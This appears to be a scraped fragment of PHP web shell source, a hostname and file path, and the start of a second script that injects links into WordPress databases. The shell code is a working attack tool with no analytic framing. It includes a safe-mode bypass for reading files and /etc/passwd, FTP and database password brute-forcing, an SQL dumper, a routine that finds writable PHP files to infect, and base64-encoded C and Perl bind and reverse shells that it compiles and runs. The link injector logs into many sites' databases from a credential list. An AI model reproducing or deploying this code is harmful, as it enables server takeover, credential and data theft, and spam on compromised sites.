hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> </form></div>"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; hardFooter(); } function actionInfect() { hardHeader(); echo '<h1>Infect</h1><div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<input type=hidden name=ne value="">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($â = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($â as $k=>$v) { if($v === null) $â[$k] = "NULL"; elseif(is_int($v)) $â[$k] = $v; else $â[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $â).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($â = $this->fetch()) { $columns = array(); foreach($â as $k=>$v) { $â[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } hardHeader(); echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($â = $db->fetch()) { list($key, $value) = each($â); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='".@addslashes($_POST['sql_base'])."'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($â = $db->fetch($tbls_res)) { list($key, $value) = each($â); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; $line = 1; while($â = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($â as $key => $value) echo '<th>'.$key.'</th>'; reset($â); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($â as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> </form> <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $â = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $â = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; hardFooter(); } if( empty($_POST['a']) ) if(isset($â) && function_exists('action' . $â)) $_POST['a'] = $â; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>
login-10.hoststar.at
at ttux199/wj39l.php
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>automatical inserter links to wordpress database</title> <script> function hide() { var obj = document.getElementById("message"); obj.style.display = "none"; } setTimeout(hide, 5000); </script> </head> <body> <?php DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?> <h1>Actions</h1> <form action="<?=$_SERVER['SCRIPT_NAME'] ?>"> <input type="radio" name="flink" value="links_txt" >links.txt <input type="radio" name="flink" value="links1_txt">links1.txt <input type="hidden" name="a" value="post" /> <input type="submit" value="post links"> </form> <a href="?a=reverse">reverse posting</a><br /> <h2>Logs</h2> <a href="?l=connect">connections.log</a><br /> <a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br /> <a href="?l=reverse">reverse.log</a><br /> <br /> <a href="?d=true">archive logs</a><br /> <div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;"> <?php $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); $num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = 